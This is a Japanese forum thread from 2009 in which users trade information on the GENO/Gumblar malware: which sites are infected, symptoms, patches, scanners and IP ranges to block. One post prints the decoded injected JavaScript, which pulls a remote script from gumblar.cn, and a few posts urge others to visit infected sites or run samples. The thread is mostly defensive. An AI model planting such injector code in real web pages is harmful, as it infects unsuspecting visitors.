JavaScriptの正規表現だからそれでOK
/*とか無くてもいい
460:名無しさん@お腹いっぱい。
09/05/14 15:32:45
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
461:名無しさん@お腹いっぱい。
09/05/14 15:32:50
aguseの件はマジびびった。
ミイラ取りが。。になったかとおもたよ
462:名無しさん@お腹いっぱい。
09/05/14 15:39:02
>>454
これってoperaの場合どうやればいいの?
463:名無しさん@お腹いっぱい。
09/05/14 15:41:25
adblockにIPアドレスベースのアクセスフィルタ機能はないでしょ
464:名無しさん@お腹いっぱい。
09/05/14 15:42:53
425だが、
OSvistaでGENO大丈夫かと思うが心配だから
カスペ使おうと思ったがセキュリティソフトがマカフィで機能の一時停止ができない、、
他にできる確認方法ある?
WINDOWSのsqlsodbc.chmのチェックくらい?
探してもないんだが、、
465:名無しさん@お腹いっぱい。
09/05/14 15:44:56
>>459
>>463
どっちが正しいの?
466:名無しさん@お腹いっぱい。
09/05/14 15:48:24
踏んでみれば分かる
467:名無しさん@お腹いっぱい。
09/05/14 15:49:49
>>466
えええええええええええええええええ
468:名無しさん@お腹いっぱい。
09/05/14 15:49:58
カスペのオンラインスキャンの事を言ってるなら
ニフティのが同一らしいのでそっち使うといい
469:名無しさん@お腹いっぱい。
09/05/14 15:53:01
>>448
ヘルプ>アクロバットリーダー9について の所で
バージョン9.11になっていなければパッチ適用されてない
470:名無しさん@お腹いっぱい。
09/05/14 15:56:08
>>413
>小林製薬によれば、ユーザーが感染した恐れがあるのはダウンローダー型のトロイの木馬。主な動作としては、
>改ざんされたページにアクセスした場合、別のページからウイルスやスパイウェアをダウンロードするという。
>また、感染した場合には、「sqlsodbc.chm(C:\WINDOWS\system32\sqlsodbc.chm)が改変されるほか、
>コマンドプロンプトとレジストリエディタが起動不能になることが確認されている
ああ、間違いないGENOだ。
471:名無しさん@お腹いっぱい。
09/05/14 15:56:50
>>436
カスペのサポセンに聞いたらチェックする時に設定を推奨レベルではなく高にして
何度かやってみてくれと言われた。それで感染の有無が分かるはずだってさ
472:名無しさん@お腹いっぱい。
09/05/14 15:59:04
>>471
オンラインスキャンでも同じ?
てかわざわざサンクス
473:名無しさん@お腹いっぱい。
09/05/14 15:59:44
>>464
ニフティのがカスペエンジンだったはず。
そっち使ってみては?
474:名無しさん@お腹いっぱい。
09/05/14 16:03:10
>>473
サンクス
475:名無しさん@お腹いっぱい。
09/05/14 16:06:08
>>466
俺xpだから、だれかadblock入れてる人>>454のフィルタ入れて>>384踏んでみてよ
お願いします
476:名無しさん@お腹いっぱい。
09/05/14 16:07:48
>>413
小林製薬はこのウイルスに面白いネーミングをつけてくれるはず
477:>>448
09/05/14 16:07:49
>>452
はい。>>292さんの所からやりました。
更新日時も今日の15時ぐらいになってます。
でも9.1(9.10のことですよね)のままです。
478:名無しさん@お腹いっぱい。
09/05/14 16:11:15
>>468
>>452
9.1.1になってました!
ほんとーーーに有難うございます!
479:名無しさん@お腹いっぱい。
09/05/14 16:12:34
>>469
スマソ間違えた。
本当に有難う!
480:名無しさん@お腹いっぱい。
09/05/14 16:14:40
どんなソフトも大体そのへんにバージョン表示されるからw
481:名無しさん@お腹いっぱい。
09/05/14 16:16:40
>>477
Product Adobe Reader
Version 9.1.1
Platform Windows
File Name AdbeRdrUpd911_all_incr.msp
File Size 1168 KB
これだぞ URLリンク(www.adobe.com)
482:名無しさん@お腹いっぱい。
09/05/14 16:18:16
感染してた!
sqlsodbc.chm見事に改変されてるううう
クリーンインストールしてくる…
483:名無しさん@お腹いっぱい。
09/05/14 16:27:07
>>482
いってら~
484:名無しさん@お腹いっぱい。
09/05/14 16:30:57
WinXPつかっててGDATAがアクセス拒否した。
ウェブサイトがブロックされました。
G DATA InternetSecurity 2009 がこのウェブサイトへのアクセスを拒否しました。
このサイトは感染しています。感染コード: JS:Redirector-H2 [Trj] (エンジン B)
保存してソース見たかったけどそれも出来なかった(拒否される)からエミュのWindows98でアクセスしないように保存して、ソース見た。
URLリンク(ghard.run.buttobi.net)
…これ? エミュでもアクセスして感染するとハードディスクファイルを戻すのが面倒だからね、、、
Javascriptはいつも切ってるけどこれなら感染しないのかな。
485:名無しさん@お腹いっぱい。
09/05/14 16:35:07
めっさ伸びとる
486:名無しさん@お腹いっぱい。
09/05/14 16:37:25
>>470
ファイル実行regeditで
起動すればセーフって事?
487:名無しさん@お腹いっぱい。
09/05/14 16:38:59
ガチでパニックが起きそうだな
488:名無しさん@お腹いっぱい。
09/05/14 16:39:34
>>285
489:名無しさん@お腹いっぱい。
09/05/14 16:41:52
インフルよりアレかもね。
490:名無しさん@お腹いっぱい。
09/05/14 16:42:26
URLリンク(update.microsoft.com)
これだめなん?
491:名無しさん@お腹いっぱい。
09/05/14 16:44:22
あっちはいまのところ他人事だけど、こっちは目の前の火事だからな
492:名無しさん@お腹いっぱい。
09/05/14 16:46:15
ワクチンないもんね。
フルインスコでなおるつっても邪魔くさいし。
493:名無しさん@お腹いっぱい。
09/05/14 16:47:55
とにかくここに書いてあるIPを範囲焼き
URLリンク(www3.atword.jp)
494:名無しさん@お腹いっぱい。
09/05/14 16:52:05
薬事日報→小林製薬という流れか?
495:名無しさん@お腹いっぱい。
09/05/14 17:00:09
笑い男事件
496:名無しさん@お腹いっぱい。
09/05/14 17:00:31
>>480
そうなんですね。
全然知らなかった。
一つ賢くなったよ、有難う。
>>481
はい。
それやりました。
URLが紫になってます。
「URLが紫になってます。」だって。
初心者すぎて自分で泣けてくる。
497:名無しさん@お腹いっぱい。
09/05/14 17:27:43
>>374-
乙です
一応、電凸して対応する様伝えました
498:名無しさん@お腹いっぱい。
09/05/14 17:40:37
>>497
電凸した反応はどうだった?
499:名無しさん@お腹いっぱい。
09/05/14 17:42:41
>>482
感染したのはビスタの人でつか?
500:名無しさん@お腹いっぱい。
09/05/14 17:45:09
早く普通に駆除できるようにならんのかな
501:名無しさん@お腹いっぱい。
09/05/14 17:54:24
>>499
ビスタにsqlsodbc.chmはないから違うと思う
502:名無しさん@お腹いっぱい。
09/05/14 17:57:59
>>498
横柄の極み
同じ事を何度も言わせるわ、待たせるわ
PHSで東京から大阪まで電話代が幾ら掛かるか配慮もせんと
一回氏ね、みたいなw
503:名無しさん@お腹いっぱい。
09/05/14 18:00:45
>>501
㌧クス。
ビスタまで殺られたと思ってUNKOもらすとこだった!
504:名無しさん@お腹いっぱい。
09/05/14 18:06:24
374=384です
avastで、全ドライブをチェックかけましたが、ウイルスは検出されませんでした
これは、最初のアラート音が鳴った時に、ページを開く前にウイルスのコードをavastが発見して
実行するのを未然防止したと考えて良いんでしょうか?
それとも、もはやavastでも検出できないような姿に変化して、ブート領域にウイルスが住み着いているんでしょうか?
何か、ウイルスに感染しているかどうか確かめる方法(どっかのディレクトリの特定ファイルが削除されているとか、
改変されているとか、新しく特定名称のフォルダ、ファイルが作られているとか・・・)ってありませんか?
とりあえず、avastで全ドライブをチェックかけて、何も出て来なければ、感染を未然に防止できたと考えてOKでしょうか?
505:名無しさん@お腹いっぱい。
09/05/14 18:07:06
たった今、うっかりGENOのホームページに行ってしまったんだがまだヤバいの?
詳しいこと知らないので、心臓バクバクいってます。
506:名無しさん@お腹いっぱい。
09/05/14 18:11:00
>>471だけどカスペ先生の更新時期がもう直ぐavastは
無料なのにGENOウイルス検知するほど性能がいいのか・・
更新しないでavast使ってみようかなぁ
スレチでスマン
507:名無しさん@お腹いっぱい。
09/05/14 18:18:45
今回はたまたまavastが頑張ったという気もするけど
うちはavast+定期的に他社オンラインスキャンで今までウィルスに引っかかった事は無いかな
508:名無しさん@お腹いっぱい。
09/05/14 18:22:17
>>493
URLリンク(up2.viploader.net)
一時間かかった・・・・・
PCtoolは設定が面倒だなぁ
509:名無しさん@お腹いっぱい。
09/05/14 18:32:08
うちのルーターはIP焼き設定数上限に達しやがったぜ・・・
510:名無しさん@お腹いっぱい。
09/05/14 18:32:37
>>481
なぜか実際のサイズが
2,150,400 バイト
511:名無しさん@お腹いっぱい。
09/05/14 18:40:05
>>374>>497
今そこはサイトメンテナンスしているようだ
ユーザー名とパスワードを要求してくるな
512:名無しさん@お腹いっぱい。
09/05/14 18:49:18
IPブロックって、
peergurdianなんかでやるんですか?
513:名無しさん@お腹いっぱい。
09/05/14 18:51:52
GENOウイルスってトロイの木馬らしいですが、具体的にどういう悪さをするんですか?
514:名無しさん@お腹いっぱい。
09/05/14 18:55:19
スレ嫁
515:名無しさん@お腹いっぱい。
09/05/14 19:05:04
スレをざっと見渡した感じでは、良く挙動が分かっていないってことですかね?
516:名無しさん@お腹いっぱい。
09/05/14 19:33:04
>>515
そう書けば、誰かが教えてくれると思った?
面倒な人だね
517:名無しさん@お腹いっぱい。
09/05/14 19:35:05
書き込み>>425だが、チェックしてきたお
【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
【結果】
1:正常に起動○
2:改変は無し○
3:管理者モードでIE起動方法わからず・・・orz△
3がチェックできれば完璧なんだが・・・
518:名無しさん@お腹いっぱい。
09/05/14 19:41:44
WHOのパンデミック警報はフェーズ5だけど、
このウイルスはフェーズ幾つぐらいよ?
519:名無しさん@お腹いっぱい。
09/05/14 19:43:54
>>516
いや、思いませんでしたよ
2chは不親切な人が多いですから
520:名無しさん@お腹いっぱい。
09/05/14 19:58:58
>>518
もうフェーズ6レベルじゃね?
収まる気配ゼロだし
521:名無しさん@お腹いっぱい。
09/05/14 20:05:00
>>517
カスペはやらなかったのか
522:521
09/05/14 20:05:52
あ、すまん、ニフやってきたのね
523:名無しさん@お腹いっぱい。
09/05/14 20:24:37
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
524:名無しさん@お腹いっぱい。
09/05/14 20:26:32
>>522
一応事故解決してニフでチェックでできたお
【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
【結果】
1:正常に起動○
2:改変は無し○
3:ウィルスはなし○
ということで一応大丈夫みたい
ただちにウィルス更新とバックパックしてきま
525:名無しさん@お腹いっぱい。
09/05/14 20:26:57
>>484
unescape~replaceの右上にgumblarが出てるな。
526:名無しさん@お腹いっぱい。
09/05/14 20:29:20
>>523
Googleの検索結果を改竄って初めて見るが、何処の情報?
527:名無しさん@お腹いっぱい。
09/05/14 20:30:35
>>526
ほい。
UnderForge of Lack ≫ Blog Archive ≫ ScanSafe reported the zlkon virus progress
URLリンク(www3.atword.jp)
528:名無しさん@お腹いっぱい。
09/05/14 20:31:39
>>523
何でもありだなw
529:名無しさん@お腹いっぱい。
09/05/14 20:32:15
XP厨はいつ何時やられるかわからず冷や冷やもんだな
530:名無しさん@お腹いっぱい。
09/05/14 20:40:01
>>523
なぶり殺しと言うか、何と言うか…。
いっそ、HDDを綺麗さっぱりフォーマットしてくれた方が…。
531:名無しさん@お腹いっぱい。
09/05/14 20:40:56
google検索改竄して自サイトへアクセスさせようとするのかな
532:名無しさん@お腹いっぱい。
09/05/14 20:46:59
終息してるし次スレは要らないね。
533:名無しさん@お腹いっぱい。
09/05/14 20:48:06
>>531
アフィリエイト狙いらしい。
そこから足が付きそうだけど、匿名口座とかも使ってるんだろう。
534:名無しさん@お腹いっぱい。
09/05/14 20:48:17
>>532
GENO社員乙
535:名無しさん@お腹いっぱい。
09/05/14 20:49:43
>>527
thx
536:名無しさん@お腹いっぱい。
09/05/14 20:54:36
このウイルス、VISTAはスルーなんだって?
俺、XPなんだけど
cmd.exe、regedit.exeが起動したってことは
感染してないってことおkなんだよね?
537:名無しさん@お腹いっぱい。
09/05/14 20:54:51
>>533
なるほど、意外とこすいなぁw
538:名無しさん@お腹いっぱい。
09/05/14 20:55:03
>>532
逆に拡散してると思うがw
539:名無しさん@お腹いっぱい。
09/05/14 20:56:16
>>536
念のために
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
ぐらいはしておいたほうが・・・
540:名無しさん@お腹いっぱい。
09/05/14 20:57:58
>>523
・ゾンビ化も追加
ソースは>>324
>>530
生かさず殺さずだね
541:名無しさん@お腹いっぱい。
09/05/14 20:58:16
VISTA感染報告きてるね
542:名無しさん@お腹いっぱい。
09/05/14 20:59:01
まだ未確定の段階か
543:名無しさん@お腹いっぱい。
09/05/14 21:00:22
>>541
まじすか?
544:名無しさん@お腹いっぱい。
09/05/14 21:01:02
>>508
素直にPG2で設定しろよ。
545:名無しさん@お腹いっぱい。
09/05/14 21:02:17
>>532
なんか久しぶりだな。GENO社員乙w
546:名無しさん@お腹いっぱい。
09/05/14 21:06:01
・Googleの検索結果を改竄(リンクを弄る)
↑これどうやって確認すればいいの?
547:名無しさん@お腹いっぱい。
09/05/14 21:08:38
>>543
まだ詳しいことかいてないからわからないけど、一応貼っとくね
***
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
スレリンク(news板:864番)
864 名前: キクザキイチゲ(中国地方)[sage] 投稿日:2009/05/14(木) 20:24:48.23 ID:0ZvJo5LH
該当時間のsaymoveにアクセスした後、パソコンの挙動がえらい不安定に
なったんだけど、やっぱりこれって喰らってしまったんでしょうか?。
ビスタHomePremium64bit+avast!なんですけど、
頻繁にフリーズするようになった(PCを購入して約2年一度も無かったのに、
一昨日から今日までに7回もフリーズ。)
あと、ついさっき、
スリープにしてても勝手に復帰している
スリープから復帰して暫くすると、HDDを認識しないようになる
といった症状がでた。
一応、カスペルスキーのオンラインスキャンの重要な部分だけを試して
みたけど、検出はされませんでした。トレンドマイクロの方も同様。
報告されている症状と全く違うんですが、どうなんでしょ?。
548:名無しさん@お腹いっぱい。
09/05/14 21:11:54
>>546
アフィのスクリプトをひとつずつページソースで確認するしかないでしょ。
549:名無しさん@お腹いっぱい。
09/05/14 21:19:11
>>548
面倒だなw
firefoxなんだけどWOT(Web of Trust)とか入れてもだめなのかな?
ちなみにWOTって「分かりやすく色分けされたWOTアイコンによって
サイトへのリンクをクリックする前に、オンライン詐欺、なりすまし
不審なショッピングサイト、セキュリティの脅威などを回避できます」
というアドオンですが、自分は入れてません
550:名無しさん@お腹いっぱい。
09/05/14 21:27:16
avastさんが感知してくれたのに誤作動だと思って突っ込んで感染した俺だけど
やっぱりIEがよく反応無しになる、おまけにパソゲーも反応無しになる
今カスペルスキーってとこでオンラインスキャンしてるが
このウイルスはどこに感染するんだ?32のチェックはもう終わったみたいだが
何も検出されなかったぞ?
全領域でやったら一件検出されたが何か勝手に止まったわ
551:名無しさん@お腹いっぱい。
09/05/14 21:29:10
ググれば一番上にくるからすぐ分かると思うけど「ライブハウス あさがやドラム」の
サイトも怪しいらしいのですが、誰かvistaの人確認してくれないかなw
552:名無しさん@お腹いっぱい。
09/05/14 21:29:54
>>550
感染が確実なら時間勿体無いから即リカバリしたほうがいいよ。
疑心暗鬼で使い続けるのは精神的に辛いでしょ
553:名無しさん@お腹いっぱい。
09/05/14 21:32:09
>>550
新種が毎日出ててカスペも新種は当然スルー
554:名無しさん@お腹いっぱい。
09/05/14 21:32:22
>>552
代えのHDDがねえんだよっ!仕事ねえからさ・・・
555:名無しさん@お腹いっぱい。
09/05/14 21:35:39
Aviraは感知してくれる?
誤作動はないし、>>539でチェックしても問題ないから、
いまんところ被害はないと思うけど、
怖いものみたさで問題サイト踏んでみたいという妙な欲望も・・・
556:名無しさん@お腹いっぱい。
09/05/14 21:36:23
>>551
感染してる
557:名無しさん@お腹いっぱい。
09/05/14 21:39:05
>>556
おおっ!!
ありがとう勇者様、一昨日は大丈夫だったらしいんだが・・・
なんか被害拡散してるなw
558:名無しさん@お腹いっぱい。
09/05/14 21:40:42
何れにしても中古の使い捨てPCでよかったよ。
559:名無しさん@お腹いっぱい。
09/05/14 21:40:51
これってプログラムが書き換えられるだけみたいだし
システムの復元とか使えないんだろか?
560:名無しさん@お腹いっぱい。
09/05/14 21:44:36
>>559
フルバックアップでもなければ無理だろ。
561:名無しさん@お腹いっぱい。
09/05/14 21:46:09
>>559
>システムの復元
それのほうが怖いよw
562:名無しさん@お腹いっぱい。
09/05/14 21:46:35
スレの伸び方が恐ろしい。
急に拡散した?
563:名無しさん@お腹いっぱい。
09/05/14 21:47:32
>>559
そんな無意味な事するくらいならインストールしなおすわ。
564:名無しさん@お腹いっぱい。
09/05/14 21:50:40
>>562
前から拡散、大手・個人の各サイトが隠蔽・感染に気づかず
新型インフルを超えた・・・。しかし、山田みたいに話題にも
あがらない・・・
565:名無しさん@お腹いっぱい。
09/05/14 21:51:03
>>544
こんなのあるのか
thx
566:名無しさん@お腹いっぱい。
09/05/14 21:51:43
>>549
中の人やユーザの評価で安全か有害か決めるんならあまり頼れないんじゃない?
567:名無しさん@お腹いっぱい。
09/05/14 21:56:18
PeerGuardian 2 for Windows β6b 日本語第2版
URLリンク(www.dukedog.flnet.org)
繋がらなくて落とせねぇ
568:名無しさん@お腹いっぱい。
09/05/14 21:57:36
>>566
だよね・・・
569:名無しさん@お腹いっぱい。
09/05/14 21:58:08
>>562
小林製薬(>>351)とネラーに利用者が多そうなSayMove!(>>282)の感染が発覚。
570:名無しさん@お腹いっぱい。
09/05/14 22:02:05
小林製薬が感染したことで、PCライトユーザーにも十分認知されればいいんだけど。。
571:名無しさん@お腹いっぱい。
09/05/14 22:02:28
これはググルさんが公式に対策に乗り出したってこと?
Google Safe Browsing diagnostic page for gumblar.cn
URLリンク(google.com)
Gumblar hitting Googlers hard
URLリンク(www.daniweb.com)
Large amount of cross-site scripting attacks see websites compromised - SC Magazine UK
URLリンク(www.scmagazineuk.com)
572:名無しさん@お腹いっぱい。
09/05/14 22:02:29
潜在感染者が多そうだな。
573:名無しさん@お腹いっぱい。
09/05/14 22:03:35
>>568
てゆうかWeb of Trustでググッたこのサイトは大丈夫かな?
URLリンク(d.hatena.ne.jp)
なんかもうどのサイトも不安になってきたよ
できたらチェックお願いVISTAの方
574:名無しさん@お腹いっぱい。
09/05/14 22:11:47
>>573
俺XPなんで、対策してても怖くて踏めませんw
ところで>>129が繋がんないんだけど、俺だけ?
575:名無しさん@お腹いっぱい。
09/05/14 22:11:55
ウイルスセキュリティZEROのサイトのサービスが止まってるってよ。
576:名無しさん@お腹いっぱい。
09/05/14 22:15:00
VMware導入した。ウイルスの挙動を確かめたいんで、感染済みのサイト教えてくれ。
あとAcrobat Reader9.1でも感染するっけ?
577:名無しさん@お腹いっぱい。
09/05/14 22:19:20
>>576
>>551
578:名無しさん@お腹いっぱい。
09/05/14 22:20:23
感染してすぐ症状出るものですか?
579:名無しさん@お腹いっぱい。
09/05/14 22:20:33
フラッシュとアドビ9.1入れてasagaya-drum.com 踏んだけど
特になにもおきない
580:名無しさん@お腹いっぱい。
09/05/14 22:21:25
(\.n 安全安心とっても快適な工夫もいっぱい windowsVISTA みんな買おうよ!
ヽ .ソ
| | ∧_∧
| | ∧_∧ _( ´∀`) ∧_∧ ∧_∧ ∧_∧ ∧_∧ ∧_∧
\ \( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) n
\ ⌒ ̄ヽ ./~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E)
∩. `、 ./ ̄| //`i / /| //`i / | ヽ ヽ/ /
. (7ヌ)| | (ミ ミ) | ∧__∧ | /(ミ ミ) |∧_∧| | | \__/
/ / ∧_∧ ∧_∧ _( ´∀`) ∧_∧ ∧_∧_(´∀` ) ∧_∧ ||
\ \( ´∀`)―--( ´∀` ) ̄ ⌒ヽ ( ´∀` ) ( ´∀` ) _ ⌒ヽ(´∀` ) //
(\.n\ /⌒ ⌒ ̄ヽ /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒ /
ヽ .ソ | |ー、 / ̄| //`i / 、 /| //` i /
| | | | |∧_∧ / (ミ ミ) | | | /(ミ ミ) .| |
| | ∧_∧ _( ´∀`) ∧_∧ | ∧_∧___∧_∧ .|∧_∧ \ ∧_∧.|
\ \( ´∀` ) ̄ ⌒ヽ( ´∀` ) | ( ´∀` ) _ (´∀` )⌒`(´∀` )--―(´∀` ) | . . n
\ ⌒ ̄ヽ . /~⌒ ⌒/⌒ ⌒ヽ /~⌒ ⌒\ \ ( E)
∩. `、 ./ ̄| //`i / 、 /| //`i / | ヽ ヽ/ /
. (7ヌ)| | (ミ ミ) | ∧ ∧ | /(ミ ミ) |∧ ∧ | | | \__/
581:名無しさん@お腹いっぱい。
09/05/14 22:22:32
ポットウィルスなら駆除出来るけどこれは難しいのかなぁ
582:名無しさん@お腹いっぱい。
09/05/14 22:24:33
>>580
お前ら全員VistaにくるとVistaが狙われるようになるから来ないでくれるか?
583:名無しさん@お腹いっぱい。
09/05/14 22:25:51
>>567
オレも導入しようとしたが、日本語版とれないな・・・
584:名無しさん@お腹いっぱい。
09/05/14 22:26:21
>>579
>>102は?
585:名無しさん@お腹いっぱい。
09/05/14 22:28:19
aguseでは白だな。>あさがやドラム
586:名無しさん@お腹いっぱい。
09/05/14 22:28:25
質問です。
私、セキュリティソフトはソースネクストの ウィルスセキュリティZERO を使ってるのですが、
このセキュリティソフトはGENOウィルスに対応しているんでしょうか?
587:名無しさん@お腹いっぱい。
09/05/14 22:30:01
>>586
>>575
588:名無しさん@お腹いっぱい。
09/05/14 22:31:58
>>584
アドビ8.13にして全部踏んだけどなんともないわ
589:名無しさん@お腹いっぱい。
09/05/14 22:32:14
>>579
>>432のGoogle セーフ ブラウジングの結果で挙げられている幾つかのサイトはどうか。
590:名無しさん@お腹いっぱい。
09/05/14 22:33:16
>>579
そのサイトも侵されている
591:名無しさん@お腹いっぱい。
09/05/14 22:33:51
Adobe Reader・Acrobat に不正終了やコード実行の脆弱性―JPCERT/CC が注意喚起 - japan.internet.com Webテクノロジー
URLリンク(japan.internet.com)
本物そっくりの「Flash Player」偽サイト出現、目的はウイルス配布:ITpro
URLリンク(itpro.nikkeibp.co.jp)
こっちは関係あると思ったらなかった
592:名無しさん@お腹いっぱい。
09/05/14 22:36:15
もうなにがなんだかwwwww
593:名無しさん@お腹いっぱい。
09/05/14 22:45:36
どこ踏んでも、sqlsodbc.chmの改変確認できねえぞ
594:名無しさん@お腹いっぱい。
09/05/14 22:50:36
ポッドウィルス駆除じゃこれは取りきれないか?
595:名無しさん@お腹いっぱい。
09/05/14 22:52:56
ポッドウィルスw
596:名無しさん@お腹いっぱい。
09/05/14 22:57:41
>>594
つ クリーンインストール
597:名無しさん@お腹いっぱい。
09/05/14 23:04:34
>>593
↓このスレから種を拾って直接実行すれば…。
【鑑定目的禁止】検出可否報告スレ10
スレリンク(sec板)
598:名無しさん@お腹いっぱい。
09/05/14 23:04:50
>>595
ごめん。ポットだったw
599:名無しさん@お腹いっぱい。
09/05/14 23:11:33
またかw
BIG-server.com binboserver.com メンテナンス / 障害報告
URLリンク(www.maido3.cc)
600:PG2
09/05/14 23:19:50
PG2導入したんですが、上記セキュリティブログの58.65.232.0 - 58.65.239.255とかの数字を
PG2のリスト追加にコピペすればいいのかな?
601:名無しさん@お腹いっぱい。
09/05/14 23:22:43
今北産業 現状のウイルス対策ソフトじゃ対応できないってマジ?
602:名無しさん@お腹いっぱい。
09/05/14 23:24:21
亜種がワラワラ出てきてるwww
対応おっつかねwww
603:名無しさん@お腹いっぱい。
09/05/14 23:25:56
Adobe Reader 9.1.1のアップデート、Adobeの日本語サイトにぜんぜん載ってないじゃん
わかりやすく載せとけよ
604:名無しさん@お腹いっぱい。
09/05/14 23:27:21
maidoの感染は、マァブが原因らしい
605:名無しさん@お腹いっぱい。
09/05/14 23:28:45
具体的に被害が出てるのはOS関連ファイル?
普通のファイルにも感染する?
606:名無しさん@お腹いっぱい。
09/05/14 23:29:00
ソフト会社の人にはモカやユンケル飲んで死なない程度にがんばってほしい。
607:名無しさん@お腹いっぱい。
09/05/14 23:30:37
対策
* WindowsUpdate
* PDFリーダーを最新にする (AdobeReader や Foxit Reader)
* AdobeFlashを最新にする
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
* Javascriptを切る
* 貼られている怪しいリンクをむやみに開かない
* ウイルス定義ファイルを更新する
↑これの
* 94.247.2.195(94.247.[2-3].[0-255])への接続を遮断
はfirefoxのアドオンで対応できますか?
608:名無しさん@お腹いっぱい。
09/05/14 23:33:05
>>567 >>583 こちらへ
PeerGuardian 33
スレリンク(download板)
609:名無しさん@お腹いっぱい。
09/05/14 23:34:41
>>607
アンチウイルスのFWに設定したほういいと思う
610:名無しさん@お腹いっぱい。
09/05/14 23:36:08
Javascript切ると見れなくなるサイトいっぱいあるじゃん
不便すぎる
611:名無しさん@お腹いっぱい。
09/05/14 23:38:23
adobe関係をアンインストールしときゃなんとかなる?
WindowsUpdateは今回のGENOウィルスには関係無いだろうけど、セキュリティー
強化の為にはまあ必要なことだ。
612:名無しさん@お腹いっぱい。
09/05/14 23:38:59
>>608
ありがとう。スレあったのね。いってきマース
613:名無しさん@お腹いっぱい。
09/05/14 23:41:45
>>609
ウイルスバスターだけど、設定画面みても分からんなw
ひょっとしてできないのかしら・・・
614:名無しさん@お腹いっぱい。
09/05/14 23:54:57
>>613
暇だから調べてみた
URLリンク(virus.bind-web.net)
この辺参考にならん?
615:名無しさん@お腹いっぱい。
09/05/14 23:55:30
>>613
例外ルール(プロトコル)でぐぐれ
616:名無しさん@お腹いっぱい。
09/05/15 00:03:13
>あさがやドラム
解読してみた。
(function(xHRY){var Yh7='var a="ScriptEngine",b="Version() ",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";
eval("if(window." a ")j=j "+a "Major" b a "Minor" b+a "Build" b "j;");
document.write("<script src=//gumblar.cn/rss/?id="+j "><\/script>");}';var x6Z=Yh7.replace(xHRY,'%');eval(unescape(x6Z))})(/_/g);
真っ黒でつ。
617:名無しさん@お腹いっぱい。
09/05/15 00:06:57
ドクオが混じってるかと思ったら別もんか
("A")
618:名無しさん@お腹いっぱい。
09/05/15 00:09:02
/gumblar.cn・・・
619:名無しさん@お腹いっぱい。
09/05/15 00:12:07
でもこれで感染したサイトへの電凸が容易になったんじゃない?
「小林製薬のサイトを見てください、それと同じウイルスに感染していますよ」って説明できるし
(誰もが知っている)大手のサイトだから信用もしてもらいやすくなったはず
620:名無しさん@お腹いっぱい。
09/05/15 00:25:36
>>617
こっちは泣いてるおにゃのこっぽいな> (/_/g);
621:名無しさん@お腹いっぱい。
09/05/15 00:30:32
メガネメガネ ("A" )))....
622:名無しさん@お腹いっぱい。
09/05/15 00:33:44
b "j;")
623:名無しさん@お腹いっぱい。
09/05/15 00:35:38
大山鳴動して鼠一匹
624:名無しさん@お腹いっぱい。
09/05/15 00:40:38
ポケモンのファンサイトにも感染してたけどこれはどういう事なんだ?
で、メール送っても対応無し。ブログ見ると「よくわからないので土曜日に兄に対応してもらいます」
…
625:名無しさん@お腹いっぱい。
09/05/15 00:43:30
どういうこともなにも感染してたんだろう
お兄ちゃんがわかってくれるか心配だね
626:名無しさん@お腹いっぱい。
09/05/15 00:45:01
弟なのか妹なのか
627:名無しさん@お腹いっぱい。
09/05/15 00:45:48
しかし…
この脅威に世間は知らん振りか。
628:名無しさん@お腹いっぱい。
09/05/15 00:50:17
>>624
w
629:名無しさん@お腹いっぱい。
09/05/15 00:51:41
abuse.jpにアドレスぶち込めば、観戦か否かを判定できるんですか?
630:名無しさん@お腹いっぱい。
09/05/15 00:54:24
>>629
最新亜種はまず無理。
aguse.jpがどんなUAで繋ぎに行ってるのかによってはまったく検出されない。
631:名無しさん@お腹いっぱい。
09/05/15 00:56:05
>>601
事前にガードは出来るけど。
GDATAはページを開く前に真っ赤な画面になってアクセス拒否してくれた
632:名無しさん@お腹いっぱい。
09/05/15 01:04:26
aguse.jpってカスペなの?
633:名無しさん@お腹いっぱい。
09/05/15 01:06:27
>>631
それは、Avastが対応しているので、Avastのエンジンが検知してブロックしただけ。
他のベンダーだとすりぬけて、gumblar.cn の呼び出しまで進んじゃうよ。
634:名無しさん@お腹いっぱい。
09/05/15 01:11:38
aviraはどうなの?ちゃんと対応してる?
635:名無しさん@お腹いっぱい。
09/05/15 01:14:07
sqlsodbc.chmのサイズが50727バイトならとりあえず感染はしてないってことなの?
636:名無しさん@お腹いっぱい。
09/05/15 01:14:20
>>634
スレリンク(sec板:862番)
自分で解凍してスキャンかけて確かめろ
637:名無しさん@お腹いっぱい。
09/05/15 01:15:15
ここでも調べられます。 URLリンク(www.gred.jp)
638:名無しさん@お腹いっぱい。
09/05/15 01:17:15
>>634
gumblar.cnの新種にはまだ対応していない。
って言うか、いたちごっこだよ。
639:名無しさん@お腹いっぱい。
09/05/15 01:19:31
国を指定して全てブロック出来れば良いのにね。出来るのかな?日本と米国以外行かないし。
640:名無しさん@お腹いっぱい。
09/05/15 01:28:43
うっかりgumblar.cn開いちゃったけど、FirefoxのSafe Browsing APIでブロックされた…
IEだったら死んでたな
641:名無しさん@お腹いっぱい。
09/05/15 01:29:15
GENOウイルスってHDも破損するんだろうか?
